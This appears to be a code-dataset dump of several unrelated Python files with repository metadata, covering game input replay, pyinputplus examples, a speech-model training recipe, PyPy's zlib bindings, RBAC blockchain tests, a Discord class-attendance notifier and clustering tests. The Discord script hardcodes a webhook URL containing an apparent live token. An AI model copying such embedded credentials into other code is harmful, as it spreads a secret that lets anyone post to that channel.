EVENT_MOUSE_MOVE = 4
def __init__(self, inputs: dict, replay_tick: int = 0):
"""
Initializes the InputReplay.
Parameters
----------
inputs: dict
The input events with the tick at which they will be issued.
replay_tick: int, optional
The local reference tick.
"""
self._inputs = inputs
self._tick = replay_tick
def play(self, tick: int, input_handler: InputHandler) -> None:
"""
Plays the actions of the replay of the specified tick.
Parameters
----------
tick: int
The current logic tick.
input_handler: InputHandler
The main input handler controlled by the replay.
"""
local_tick = str(tick - self._tick)
if local_tick in self._inputs:
events = self._inputs[local_tick]
for event in events:
if event[0] == InputReplay.EVENT_KEY_PRESS:
input_handler.key_press(key_code=event[1])
elif event[0] == InputReplay.EVENT_KEY_RELEASE:
input_handler.key_release(key_code=event[1])
elif event[0] == InputReplay.EVENT_MOUSE_BUTTON_PRESS:
input_handler.mouse_button_press(mouse_button=event[1])
elif event[0] == InputReplay.EVENT_MOUSE_BUTTON_RELEASE:
input_handler.mouse_button_release(mouse_button=event[1])
elif event[0] == InputReplay.EVENT_MOUSE_MOVE:
input_handler.move_mouse(position=numpy.ndarray(event[1]))
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "InputReplay[tick=" + str(self._tick) + "]"
class InputRecorder:
"""
A simple way of recording user inputs.
When a record is started, it will register the inputs from the user.
Attributes
----------
inputs: dict
The input events with the tick at which they were issued.
Methods
-------
key_press(tick, key_code)
Adds a key press input to the record.
key_release(tick, key_code)
Adds a key release input to the record.
mouse_button_press(tick, mouse_button)
Adds a mouse button press input to the record.
mouse_button_release(tick, mouse_button)
Adds a mouse button release input to the record.
move_mouse(tick, position)
Adds a mouse move input to the record.
get_replay(replay_tick)
Creates a replay based of the record.
"""
def __init__(self, record_tick: int = 0):
"""
Initializes the InputRecorder.
Parameters
----------
record_tick: int, optional
The local reference tick.
"""
self._record_tick = record_tick
self.inputs = {}
def _input(self, tick, event_type: int, value: any) -> None:
"""
Adds a new input to the record.
Parameters
----------
tick: int
The tick at which the input was issued.
event_type: int
The type of input.
value: any
The event data.
"""
local_tick = tick - self._record_tick
if local_tick not in self.inputs:
self.inputs[local_tick] = []
self.inputs[local_tick].append([event_type, value])
def key_press(self, tick: int, key_code: int) -> None:
"""
Adds a key press input to the record.
Parameters
----------
tick: int
The tick at which the event got fired.
key_code: int
The code of the key pressed.
"""
self._input(tick, InputReplay.EVENT_KEY_PRESS, key_code)
def key_release(self, tick: int, key_code: int) -> None:
"""
Adds a key release input to the record.
Parameters
----------
tick: int
The tick at which the event got fired.
key_code: int
The code of the key released.
"""
self._input(tick, InputReplay.EVENT_KEY_RELEASE, key_code)
def mouse_button_press(self, tick: int, mouse_button: int) -> None:
"""
Adds a mouse button press input to the record.
Parameters
----------
tick: int
The tick at which the event got fired.
mouse_button: int
The code of the mouse button pressed.
"""
self._input(tick, InputReplay.EVENT_MOUSE_BUTTON_PRESS, mouse_button)
def mouse_button_release(self, tick: int, mouse_button: int) -> None:
"""
Adds a mouse button release input to the record.
Parameters
----------
tick: int
The tick at which the event got fired.
mouse_button: int
The code of the mouse button released.
"""
self._input(tick, InputReplay.EVENT_MOUSE_BUTTON_RELEASE, mouse_button)
def move_mouse(self, tick: int, position: numpy.ndarray) -> None:
"""
Adds a mouse move input to the record.
Parameters
----------
tick: int
The tick at which the event got fired.
position: numpy.ndarray
The current position of the mouse pointer on the screen.
"""
self._input(tick, InputReplay.EVENT_MOUSE_MOVE, tuple(position))
def get_replay(self, replay_tick: int = 0) -> InputReplay:
"""
Creates a replay based of the record.
Parameters
----------
replay_tick: int
The local tick reference of the replay.
Returns
-------
replay: InputReplay
The replay associated to the record.
"""
return InputReplay(self.inputs, replay_tick)
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "InputRecorder[tick=" + str(self._record_tick) + "]"
| 27.955585 | 120 | 0.593902 |
6bd69aefb8753456fe6243ada8bcc8b569036450 | 912 | py | Python | main/strings/validation/input_plus.py | catalinprescure/python-pages | 93df3b22df2cfa269127e803a1b6c6a34bae6745 | [
"MIT"
] | null | null | null | main/strings/validation/input_plus.py | catalinprescure/python-pages | 93df3b22df2cfa269127e803a1b6c6a34bae6745 | [
"MIT"
] | null | null | null | main/strings/validation/input_plus.py | catalinprescure/python-pages | 93df3b22df2cfa269127e803a1b6c6a34bae6745 | [
"MIT"
] | 1 | 2021-12-24T15:58:32.000Z | 2021-12-24T15:58:32.000Z | """Pyinputplus
Contains functions similar to input() for other kind of data:
number, date, email, adress
Pyinputplus is not part of the standard distribution.
pip install pyinputplus
Import as pyip save us from typing pyinputplus every time.
"""
import pyinputplus as pyip
response = pyip.inputNum('What is your age? ', min=10, limit=4)
print(f'Your age is: {response}')
# What is your age? 6
# Number must be at minimum 10.
# What is your age? -10
# Number must be at minimum 10.
# What is your age? abc
# 'abc' is not a number.
# What is your age? 5
# Exception: pyinputplus.RetryLimitException
response = pyip.inputMenu(['dog', 'cat', 'horse'], lettered=True,
prompt='What is your favorite animal? \n'
)
print(f'Your favorite animal is: {response}')
# What is your favorite animal?
# A. dog
# B. cat
# C. horse
# b
# Your favorite animal is: cat | 30.4 | 65 | 0.674342 |
cb666a17551be48cc70883bb60cccf0da07f315b | 6,988 | py | Python | recipes/LibriSpeech/LM/train.py | anonymspeechbrain/speechbrain | 9a0632ddb066f5bceffb71fb971552fb542f7b7e | [
"Apache-2.0"
] | null | null | null | recipes/LibriSpeech/LM/train.py | anonymspeechbrain/speechbrain | 9a0632ddb066f5bceffb71fb971552fb542f7b7e | [
"Apache-2.0"
] | null | null | null | recipes/LibriSpeech/LM/train.py | anonymspeechbrain/speechbrain | 9a0632ddb066f5bceffb71fb971552fb542f7b7e | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
"""Recipe for training a Language Model with librispeech train-960 transcript and lm_corpus.
To run this recipe, do the following:
> pip install datasets
> python train.py hparams/<hparam_file>.yaml --data_folder <local_path_to_librispeech_dataset>
Authors
* Anonymous
"""
import os
import sys
import logging
import glob
import torch
from datasets import load_dataset
from hyperpyyaml import load_hyperpyyaml
import speechbrain as sb
from speechbrain.utils.distributed import run_on_main
logger = logging.getLogger(__name__)
# Define training procedure
class LM(sb.core.Brain):
def compute_forward(self, batch, stage):
"""Forward computations from the sentence batches to the output probabilities."""
batch = batch.to(self.device)
tokens_bos, _ = batch.tokens_bos
logits = self.hparams.model(tokens_bos)
pred = self.hparams.log_softmax(logits)
return pred
def compute_objectives(self, predictions, batch, stage):
"""Computes the loss given predictions and targets."""
batch = batch.to(self.device)
tokens_eos, tokens_len = batch.tokens_eos
loss = self.hparams.compute_cost(
predictions, tokens_eos, length=tokens_len
)
return loss
def fit_batch(self, batch):
"""Train the parameters given a single batch in input"""
predictions = self.compute_forward(batch, sb.Stage.TRAIN)
loss = self.compute_objectives(predictions, batch, sb.Stage.TRAIN)
(loss / self.hparams.accu_steps).backward()
if self.step % self.hparams.accu_steps == 0:
# gradient clipping & early stop if loss is not fini
self.check_gradients(loss)
self.optimizer.step()
self.optimizer.zero_grad()
if isinstance(
self.hparams.lr_annealing, sb.nnet.schedulers.NoamScheduler
) or isinstance(
self.hparams.lr_annealing,
sb.nnet.schedulers.CyclicCosineScheduler,
):
self.hparams.lr_annealing(self.optimizer)
return loss
def on_stage_end(self, stage, stage_loss, epoch):
"""Gets called at the end of a epoch."""
stage_stats = {"loss": stage_loss}
if stage == sb.Stage.TRAIN:
self.train_stats = stage_stats
if stage == sb.Stage.VALID and sb.utils.distributed.if_main_process():
if not (
isinstance(
self.hparams.lr_annealing, sb.nnet.schedulers.NoamScheduler
)
or isinstance(
self.hparams.lr_annealing,
sb.nnet.schedulers.CyclicCosineScheduler,
)
):
old_lr, new_lr = self.hparams.lr_annealing(stage_loss)
sb.nnet.schedulers.update_learning_rate(self.optimizer, new_lr)
else:
old_lr = self.hparams.lr_annealing.current_lr
self.hparams.train_logger.log_stats(
stats_meta={"epoch": epoch, "lr": old_lr},
train_stats=self.train_stats,
valid_stats=stage_stats,
)
self.checkpointer.save_and_keep_only(
meta=stage_stats, min_keys=["loss"],
)
def dataio_prepare(hparams):
"""grap all the .txt files for transcripts"""
logging.info("generating datasets...")
data_folder = hparams["data_folder"]
train_transcripts = glob.glob(
os.path.join(data_folder, "train*/**/*.trans.txt"), recursive=True
)
dev_transcripts = glob.glob(
os.path.join(data_folder, "dev*/**/*.trans.txt"), recursive=True
)
test_transcripts = glob.glob(
os.path.join(data_folder, "test*/**/*.trans.txt"), recursive=True
)
"""prepare data and generate datasets"""
datasets = load_dataset(
"dataset.py",
lm_corpus_path=hparams["lm_corpus_path"],
data_files={
"train": train_transcripts,
"dev": dev_transcripts,
"test": test_transcripts,
},
)
train_data, valid_data, test_data = (
datasets["train"],
datasets["dev"],
datasets["test"],
)
"""convert huggingface's dataset to DynamicItemDataset via a magical function"""
train_data = sb.dataio.dataset.DynamicItemDataset.from_arrow_dataset(
train_data
)
valid_data = sb.dataio.dataset.DynamicItemDataset.from_arrow_dataset(
valid_data
)
test_data = sb.dataio.dataset.DynamicItemDataset.from_arrow_dataset(
test_data
)
datasets = [train_data, valid_data, test_data]
tokenizer = hparams["tokenizer"]
"""Define text pipeline"""
# TODO: implement text augmentations pipelines
@sb.utils.data_pipeline.takes("text")
@sb.utils.data_pipeline.provides("text", "tokens_bos", "tokens_eos")
def text_pipeline(text):
yield text
tokens_list = tokenizer.encode_as_ids(text)
tokens_bos = torch.LongTensor([hparams["bos_index"]] + (tokens_list))
yield tokens_bos
tokens_eos = torch.LongTensor(tokens_list + [hparams["eos_index"]])
yield tokens_eos
sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline)
# 4. Set output:
sb.dataio.dataset.set_output_keys(
datasets, ["id", "text", "tokens_bos", "tokens_eos"],
)
return train_data, valid_data, test_data
if __name__ == "__main__":
# CLI:
hparams_file, run_opts, overrides = sb.parse_arguments(sys.argv[1:])
with open(hparams_file) as fin:
hparams = load_hyperpyyaml(fin, overrides)
# If distributed_launch=True then
# create ddp_group with the right communication protocol
sb.utils.distributed.ddp_init_group(run_opts)
# Create experiment directory
sb.create_experiment_directory(
experiment_directory=hparams["output_folder"],
hyperparams_to_save=hparams_file,
overrides=overrides,
)
# here we create the dataloader objects as well as tokenization and encoding
train_data, valid_data, test_data = dataio_prepare(hparams)
# We download the tokenizer from HuggingFace (or elsewhere depending on
# the path given in the YAML file).
run_on_main(hparams["pretrainer"].collect_files)
hparams["pretrainer"].load_collected(device=run_opts["device"])
lm_brain = LM(
modules=hparams["modules"],
opt_class=hparams["optimizer"],
hparams=hparams,
run_opts=run_opts,
checkpointer=hparams["checkpointer"],
)
lm_brain.fit(
lm_brain.hparams.epoch_counter,
train_data,
valid_data,
train_loader_kwargs=hparams["train_dataloader_opts"],
valid_loader_kwargs=hparams["valid_dataloader_opts"],
)
# evaluation
test_stats = lm_brain.evaluate(
test_data,
min_key="loss",
test_loader_kwargs=hparams["test_dataloader_opts"],
)
| 32.807512 | 94 | 0.647825 |
2dbf49c3c682c3a675a48c9aad656349ff7f2784 | 12,478 | py | Python | pypy/module/zlib/interp_zlib.py | microvm/pypy-mu | 6b03fbe93052d0eb3a4c67152c987c16837b3484 | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | pypy/module/zlib/interp_zlib.py | microvm/pypy-mu | 6b03fbe93052d0eb3a4c67152c987c16837b3484 | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | pypy/module/zlib/interp_zlib.py | microvm/pypy-mu | 6b03fbe93052d0eb3a4c67152c987c16837b3484 | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | import sys
from pypy.interpreter.gateway import interp2app, unwrap_spec
from pypy.interpreter.baseobjspace import W_Root
from pypy.interpreter.typedef import TypeDef, interp_attrproperty
from pypy.interpreter.error import OperationError, oefmt
from rpython.rlib.rarithmetic import intmask, r_uint
from rpython.rlib.objectmodel import keepalive_until_here
from rpython.rlib import rzlib
if intmask(2**31) == -2**31:
# 32-bit platforms
unsigned_to_signed_32bit = intmask
else:
# 64-bit platforms
def unsigned_to_signed_32bit(x):
# assumes that 'x' is in range(0, 2**32) to start with
SIGN_EXTEND2 = 1 << 31
return intmask((x ^ SIGN_EXTEND2) - SIGN_EXTEND2)
@unwrap_spec(string='bufferstr', start='truncatedint_w')
def crc32(space, string, start = rzlib.CRC32_DEFAULT_START):
"""
crc32(string[, start]) -- Compute a CRC-32 checksum of string.
An optional starting value can be specified. The returned checksum is
an integer.
"""
ustart = r_uint(start)
checksum = rzlib.crc32(string, ustart)
# This is, perhaps, a little stupid. zlib returns the checksum unsigned.
# CPython exposes it as a signed value, though. -exarkun
# Note that in CPython < 2.6 on 64-bit platforms the result is
# actually unsigned, but it was considered to be a bug so we stick to
# the 2.6 behavior and always return a number in range(-2**31, 2**31).
checksum = unsigned_to_signed_32bit(checksum)
return space.wrap(checksum)
@unwrap_spec(string='bufferstr', start='truncatedint_w')
def adler32(space, string, start=rzlib.ADLER32_DEFAULT_START):
"""
adler32(string[, start]) -- Compute an Adler-32 checksum of string.
An optional starting value can be specified. The returned checksum is
an integer.
"""
ustart = r_uint(start)
checksum = rzlib.adler32(string, ustart)
# See comments in crc32() for the following line
checksum = unsigned_to_signed_32bit(checksum)
return space.wrap(checksum)
class Cache:
def __init__(self, space):
self.w_error = space.new_exception_class("zlib.error")
def zlib_error(space, msg):
w_error = space.fromcache(Cache).w_error
return OperationError(w_error, space.wrap(msg))
@unwrap_spec(string='bufferstr', level=int)
def compress(space, string, level=rzlib.Z_DEFAULT_COMPRESSION):
"""
compress(string[, level]) -- Returned compressed string.
Optional arg level is the compression level, in 1-9.
"""
try:
try:
stream = rzlib.deflateInit(level)
except ValueError:
raise zlib_error(space, "Bad compression level")
try:
result = rzlib.compress(stream, string, rzlib.Z_FINISH)
finally:
rzlib.deflateEnd(stream)
except rzlib.RZlibError as e:
raise zlib_error(space, e.msg)
return space.wrap(result)
@unwrap_spec(string='bufferstr', wbits="c_int", bufsize=int)
def decompress(space, string, wbits=rzlib.MAX_WBITS, bufsize=0):
"""
decompress(string[, wbits[, bufsize]]) -- Return decompressed string.
Optional arg wbits is the window buffer size. Optional arg bufsize is
only for compatibility with CPython and is ignored.
"""
try:
try:
stream = rzlib.inflateInit(wbits)
except ValueError:
raise zlib_error(space, "Bad window buffer size")
try:
result, _, _ = rzlib.decompress(stream, string, rzlib.Z_FINISH)
finally:
rzlib.inflateEnd(stream)
except rzlib.RZlibError as e:
raise zlib_error(space, e.msg)
return space.wrap(result)
class ZLibObject(W_Root):
"""
Common base class for Compress and Decompress.
"""
stream = rzlib.null_stream
def __init__(self, space):
self._lock = space.allocate_lock()
def lock(self):
"""To call before using self.stream."""
self._lock.acquire(True)
def unlock(self):
"""To call after using self.stream."""
self._lock.release()
keepalive_until_here(self)
# subtle: we have to make sure that 'self' is not garbage-collected
# while we are still using 'self.stream' - hence the keepalive.
class Compress(ZLibObject):
"""
Wrapper around zlib's z_stream structure which provides convenient
compression functionality.
"""
def __init__(self, space, level=rzlib.Z_DEFAULT_COMPRESSION,
method=rzlib.Z_DEFLATED, # \
wbits=rzlib.MAX_WBITS, # \ undocumented
memLevel=rzlib.DEF_MEM_LEVEL, # / parameters
strategy=rzlib.Z_DEFAULT_STRATEGY): # /
ZLibObject.__init__(self, space)
try:
self.stream = rzlib.deflateInit(level, method, wbits,
memLevel, strategy)
except rzlib.RZlibError as e:
raise zlib_error(space, e.msg)
except ValueError:
raise oefmt(space.w_ValueError, "Invalid initialization option")
self.register_finalizer(space)
def _finalize_(self):
"""Automatically free the resources used by the stream."""
if self.stream:
rzlib.deflateEnd(self.stream)
self.stream = rzlib.null_stream
@unwrap_spec(data='bufferstr')
def compress(self, space, data):
"""
compress(data) -- Return a string containing data compressed.
After calling this function, some of the input data may still be stored
in internal buffers for later processing.
Call the flush() method to clear these buffers.
"""
try:
self.lock()
try:
if not self.stream:
raise zlib_error(space,
"compressor object already flushed")
result = rzlib.compress(self.stream, data)
finally:
self.unlock()
except rzlib.RZlibError as e:
raise zlib_error(space, e.msg)
return space.wrap(result)
@unwrap_spec(mode="c_int")
def flush(self, space, mode=rzlib.Z_FINISH):
"""
flush( [mode] ) -- Return a string containing any remaining compressed
data.
mode can be one of the constants Z_SYNC_FLUSH, Z_FULL_FLUSH, Z_FINISH;
the default value used when mode is not specified is Z_FINISH.
If mode == Z_FINISH, the compressor object can no longer be used after
calling the flush() method. Otherwise, more data can still be
compressed.
"""
try:
self.lock()
try:
if not self.stream:
raise zlib_error(space,
"compressor object already flushed")
result = rzlib.compress(self.stream, '', mode)
if mode == rzlib.Z_FINISH: # release the data structures now
rzlib.deflateEnd(self.stream)
self.stream = rzlib.null_stream
finally:
self.unlock()
except rzlib.RZlibError as e:
raise zlib_error(space, e.msg)
return space.wrap(result)
@unwrap_spec(level=int, method=int, wbits=int, memLevel=int, strategy=int)
def Compress___new__(space, w_subtype, level=rzlib.Z_DEFAULT_COMPRESSION,
method=rzlib.Z_DEFLATED, # \
wbits=rzlib.MAX_WBITS, # \ undocumented
memLevel=rzlib.DEF_MEM_LEVEL, # / parameters
strategy=rzlib.Z_DEFAULT_STRATEGY): # /
"""
Create a new z_stream and call its initializer.
"""
stream = space.allocate_instance(Compress, w_subtype)
stream = space.interp_w(Compress, stream)
Compress.__init__(stream, space, level,
method, wbits, memLevel, strategy)
return space.wrap(stream)
Compress.typedef = TypeDef(
'Compress',
__new__ = interp2app(Compress___new__),
compress = interp2app(Compress.compress),
flush = interp2app(Compress.flush),
__doc__ = """compressobj([level]) -- Return a compressor object.
Optional arg level is the compression level, in 1-9.
""")
class Decompress(ZLibObject):
"""
Wrapper around zlib's z_stream structure which provides convenient
decompression functionality.
"""
def __init__(self, space, wbits=rzlib.MAX_WBITS):
"""
Initialize a new decompression object.
wbits is an integer between 8 and MAX_WBITS or -8 and -MAX_WBITS
(inclusive) giving the number of "window bits" to use for compression
and decompression. See the documentation for deflateInit2 and
inflateInit2.
"""
ZLibObject.__init__(self, space)
self.unused_data = ''
self.unconsumed_tail = ''
try:
self.stream = rzlib.inflateInit(wbits)
except rzlib.RZlibError as e:
raise zlib_error(space, e.msg)
except ValueError:
raise oefmt(space.w_ValueError, "Invalid initialization option")
self.register_finalizer(space)
def _finalize_(self):
"""Automatically free the resources used by the stream."""
if self.stream:
rzlib.inflateEnd(self.stream)
self.stream = rzlib.null_stream
def _save_unconsumed_input(self, data, finished, unused_len):
unused_start = len(data) - unused_len
assert unused_start >= 0
tail = data[unused_start:]
if finished:
self.unconsumed_tail = ''
self.unused_data += tail
else:
self.unconsumed_tail = tail
@unwrap_spec(data='bufferstr', max_length="c_int")
def decompress(self, space, data, max_length=0):
"""
decompress(data[, max_length]) -- Return a string containing the
decompressed version of the data.
If the max_length parameter is specified then the return value will be
no longer than max_length. Unconsumed input data will be stored in the
unconsumed_tail attribute.
"""
if max_length == 0:
max_length = sys.maxint
elif max_length < 0:
raise oefmt(space.w_ValueError,
"max_length must be greater than zero")
try:
self.lock()
try:
result = rzlib.decompress(self.stream, data, max_length=max_length)
finally:
self.unlock()
except rzlib.RZlibError as e:
raise zlib_error(space, e.msg)
string, finished, unused_len = result
self._save_unconsumed_input(data, finished, unused_len)
return space.wrap(string)
def flush(self, space, w_length=None):
"""
flush( [length] ) -- This is kept for backward compatibility,
because each call to decompress() immediately returns as much
data as possible.
"""
if w_length is not None:
length = space.c_int_w(w_length)
if length <= 0:
raise oefmt(space.w_ValueError,
"length must be greater than zero")
data = self.unconsumed_tail
try:
self.lock()
try:
result = rzlib.decompress(self.stream, data, rzlib.Z_FINISH)
finally:
self.unlock()
except rzlib.RZlibError:
string = ""
else:
string, finished, unused_len = result
self._save_unconsumed_input(data, finished, unused_len)
return space.wrap(string)
@unwrap_spec(wbits=int)
def Decompress___new__(space, w_subtype, wbits=rzlib.MAX_WBITS):
"""
Create a new Decompress and call its initializer.
"""
stream = space.allocate_instance(Decompress, w_subtype)
stream = space.interp_w(Decompress, stream)
Decompress.__init__(stream, space, wbits)
return space.wrap(stream)
Decompress.typedef = TypeDef(
'Decompress',
__new__ = interp2app(Decompress___new__),
decompress = interp2app(Decompress.decompress),
flush = interp2app(Decompress.flush),
unused_data = interp_attrproperty('unused_data', Decompress),
unconsumed_tail = interp_attrproperty('unconsumed_tail', Decompress),
__doc__ = """decompressobj([wbits]) -- Return a decompressor object.
Optional arg wbits is the window buffer size.
""")
| 35.050562 | 83 | 0.626543 |
446457d16d65753f9acb5e516d09fa9367eeddf3 | 3,847 | py | Python | tests/rbac/common/role/propose_admin_tests.py | fthornton67/sawtooth-next-directory | 79479afb8d234911c56379bb1d8abf11f28ef86d | [
"Apache-2.0"
] | 75 | 2018-04-06T09:13:34.000Z | 2020-05-18T18:59:47.000Z | tests/rbac/common/role/propose_admin_tests.py | fthornton67/sawtooth-next-directory | 79479afb8d234911c56379bb1d8abf11f28ef86d | [
"Apache-2.0"
] | 989 | 2018-04-18T21:01:56.000Z | 2019-10-23T15:37:09.000Z | tests/rbac/common/role/propose_admin_tests.py | fthornton67/sawtooth-next-directory | 79479afb8d234911c56379bb1d8abf11f28ef86d | [
"Apache-2.0"
] | 72 | 2018-04-13T18:29:12.000Z | 2020-05-29T06:00:33.000Z | # Copyright 2019 Contributors to Hyperledger Sawtooth
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
"""Propose Role Add Admin Test"""
# pylint: disable=no-member
import pytest
from rbac.common import addresser
from rbac.common.role import Role
from rbac.common.user import User
from rbac.common import protobuf
from rbac.common.logs import get_default_logger
from tests.rbac.common import helper
LOGGER = get_default_logger(__name__)
@pytest.mark.role
@pytest.mark.library
def test_make():
"""Test making the message"""
next_id = helper.user.id()
role_id = helper.role.id()
proposal_id = addresser.proposal.unique_id()
reason = helper.proposal.reason()
message = Role().admin.propose.make(
proposal_id=proposal_id,
next_id=next_id,
role_id=role_id,
reason=reason,
metadata=None,
)
assert isinstance(message, protobuf.role_transaction_pb2.ProposeAddRoleAdmin)
assert message.proposal_id == proposal_id
assert message.next_id == next_id
assert message.role_id == role_id
assert message.reason == reason
@pytest.mark.role
@pytest.mark.library
def test_make_addresses():
"""Test making the message addresses"""
next_id = helper.user.id()
user_address = User().address(next_id)
role_id = helper.role.id()
role_address = Role().address(role_id)
proposal_id = addresser.proposal.unique_id()
reason = helper.proposal.reason()
relationship_address = Role().admin.address(role_id, next_id)
proposal_address = Role().admin.propose.address(role_id, next_id)
signer_user_id = helper.user.id()
message = Role().admin.propose.make(
proposal_id=proposal_id,
next_id=next_id,
role_id=role_id,
reason=reason,
metadata=None,
)
inputs, outputs = Role().admin.propose.make_addresses(
message=message, signer_user_id=signer_user_id
)
assert relationship_address in inputs
assert user_address in inputs
assert role_address in inputs
assert proposal_address in inputs
assert proposal_address in outputs
@pytest.mark.role
@pytest.mark.propose_role_admin
def test_create():
"""Test executing the message on the blockchain"""
role, _, _ = helper.role.create()
proposal_id = addresser.proposal.unique_id()
reason = helper.proposal.reason()
user, signer_keypair = helper.user.create()
message = Role().admin.propose.make(
proposal_id=proposal_id,
next_id=user.next_id,
role_id=role.role_id,
reason=reason,
metadata=None,
)
status = Role().admin.propose.new(
signer_keypair=signer_keypair, signer_user_id=user.next_id, message=message
)
assert len(status) == 1
assert status[0]["status"] == "COMMITTED"
proposal = Role().admin.propose.get(object_id=role.role_id, related_id=user.next_id)
assert isinstance(proposal, protobuf.proposal_state_pb2.Proposal)
assert proposal.proposal_type, protobuf.proposal_state_pb2.Proposal.ADD_ROLE_ADMIN
assert proposal.proposal_id == proposal_id
assert proposal.object_id == role.role_id
assert proposal.related_id == user.next_id
assert proposal.opener == user.next_id
assert proposal.open_reason == reason
| 32.058333 | 88 | 0.706005 |
92d72026931063ce5b08b18abe6c3b3e04c42a13 | 2,429 | py | Python | AttendanceBot/discordbot.py | Aadityaprabu002/GoogleMeet_Attendance_Bot | 86aee5072d3c4035a051c51fe2c00e9c739e90af | [
"MIT"
] | 1 | 2021-11-28T17:43:39.000Z | 2021-11-28T17:43:39.000Z | AttendanceBot/discordbot.py | Aadityaprabu002/GoogleMeet_Attendance_Bot | 86aee5072d3c4035a051c51fe2c00e9c739e90af | [
"MIT"
] | null | null | null | AttendanceBot/discordbot.py | Aadityaprabu002/GoogleMeet_Attendance_Bot | 86aee5072d3c4035a051c51fe2c00e9c739e90af | [
"MIT"
] | null | null | null | from discord_webhook import DiscordWebhook
from discord_webhook import DiscordEmbed
URL = 'https://discord.com/api/webhooks/774702675114983466/ToCCEVBBr6R5deNpixqkSbIFM_Z_VAXeBDqP57c-iYumLVIiucrv9I4-BA-Dj8GqVoI2'
def send_start_details(SUBJECT,NAME):
webhook = DiscordWebhook(url = URL)
embed = DiscordEmbed(title ='CLASS DETAILS',color = 3800832,description='Class Successfully Started')
embed.add_embed_field(name='SUBJECT', value=NAME)
embed.add_embed_field(name='DATE', value=SUBJECT['date'])
embed.add_embed_field(name='DAY', value=SUBJECT['day'])
embed.add_embed_field(name='START TIME:', value=SUBJECT['start'])
embed.add_embed_field(name='LINK', value=SUBJECT['URL'])
webhook.add_embed(embed)
response = webhook.execute()
def send_end_details(SUBJECT,NAME):
webhook = DiscordWebhook(url=URL)
embed = DiscordEmbed(title='CLASS DETAILS', color=3801087, description='Class Successfully Ended')
embed.add_embed_field(name='SUBJECT', value=NAME.upper())
embed.add_embed_field(name='DATE', value=SUBJECT['date'])
embed.add_embed_field(name='DAY', value=SUBJECT['day'])
embed.add_embed_field(name='END TIME', value=SUBJECT['end'])
embed.add_embed_field(name='LINK', value=SUBJECT['URL'])
webhook.add_embed(embed)
response = webhook.execute()
def send_start_error_details(SUBJECT,NAME):
webhook = DiscordWebhook(url=URL)
embed = DiscordEmbed(title='CLASS DETAILS', color=3801087, description='ERROR JOINING CLASS!!!!')
embed.add_embed_field(name='SUBJECT', value=NAME.upper())
embed.add_embed_field(name='DATE', value=SUBJECT['date'])
embed.add_embed_field(name='DAY', value=SUBJECT['day'])
embed.add_embed_field(name='END TIME', value=SUBJECT['end'])
embed.add_embed_field(name='LINK', value=SUBJECT['URL'])
webhook.add_embed(embed)
response = webhook.execute()
def send_end_error_details(SUBJECT,NAME):
webhook = DiscordWebhook(url=URL)
embed = DiscordEmbed(title='CLASS DETAILS' , color=3801087, description='ERROR LEAVING CLASS!!!!')
embed.add_embed_field(name='SUBJECT', value=NAME)
embed.add_embed_field(name='DATE', value=SUBJECT['date'])
embed.add_embed_field(name='DAY', value=SUBJECT['day'])
embed.add_embed_field(name='END TIME:', value=SUBJECT['end'])
embed.add_embed_field(name='LINK', value=SUBJECT['URL'])
webhook.add_embed(embed)
response = webhook.execute()
| 44.981481 | 128 | 0.735282 |
3086520031a94358fd79da558b632ebb6cdec06c | 885 | py | Python | tests/clustering_system/corpus/test_FolderAggregatedBowNewsCorpora.py | vanam/clustering | 6e3d3ce7e60e31519b81547bc4afdf6ef3b0079f | [
"MIT"
] | 5 | 2019-05-28T15:45:46.000Z | 2020-10-05T17:48:27.000Z | tests/clustering_system/corpus/test_FolderAggregatedBowNewsCorpora.py | vanam/clustering | 6e3d3ce7e60e31519b81547bc4afdf6ef3b0079f | [
"MIT"
] | null | null | null | tests/clustering_system/corpus/test_FolderAggregatedBowNewsCorpora.py | vanam/clustering | 6e3d3ce7e60e31519b81547bc4afdf6ef3b0079f | [
"MIT"
] | 2 | 2019-07-16T14:13:19.000Z | 2020-11-23T01:53:44.000Z | import os
import tempfile
from gensim.corpora import Dictionary
from clustering_system.corpus.FolderAggregatedBowNewsCorpora import FolderAggregatedBowNewsCorpora
class TestFolderAggregatedBowNewsCorpora:
def test_create(self):
# Current directory
dir_path = os.path.dirname(os.path.realpath(__file__))
data_path = os.path.join(dir_path, "..", "data")
dictionary_file = os.path.join(dir_path, "data", "dictionary.dict")
dictionary = Dictionary.load(dictionary_file)
temp_dir = tempfile.TemporaryDirectory()
corpora = FolderAggregatedBowNewsCorpora(data_path, temp_dir.name, dictionary, language="en")
i = 0
for c in corpora:
i += 1
# Traverse corpus
for _ in c:
pass
# Assert number of times it went through the loop
assert i == 1
| 27.65625 | 101 | 0.662147 |
26a831742bba45b470c99fd19937852f548ebc95 | 25,611 | py | Python | src/unity/python/turicreate/toolkits/recommender/ranking_factorization_recommender.py | LeeCenY/turicreate | fb2f3bf313e831ceb42a2e10aacda6e472ea8d93 | [
"BSD-3-Clause"
] | null | null | null | src/unity/python/turicreate/toolkits/recommender/ranking_factorization_recommender.py | LeeCenY/turicreate | fb2f3bf313e831ceb42a2e10aacda6e472ea8d93 | [
"BSD-3-Clause"
] | null | null | null | src/unity/python/turicreate/toolkits/recommender/ranking_factorization_recommender.py | LeeCenY/turicreate | fb2f3bf313e831ceb42a2e10aacda6e472ea8d93 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright © 2017 Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can
# be found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
"""
Methods for performing doing matrix factorization and factorization machines
for making a ranking-based recommender. See
turicreate.recommender.ranking_factorization_recommender.create for additional documentation.
"""
from __future__ import print_function as _
from __future__ import division as _
from __future__ import absolute_import as _
import turicreate as _turicreate
from turicreate.toolkits.recommender.util import _Recommender
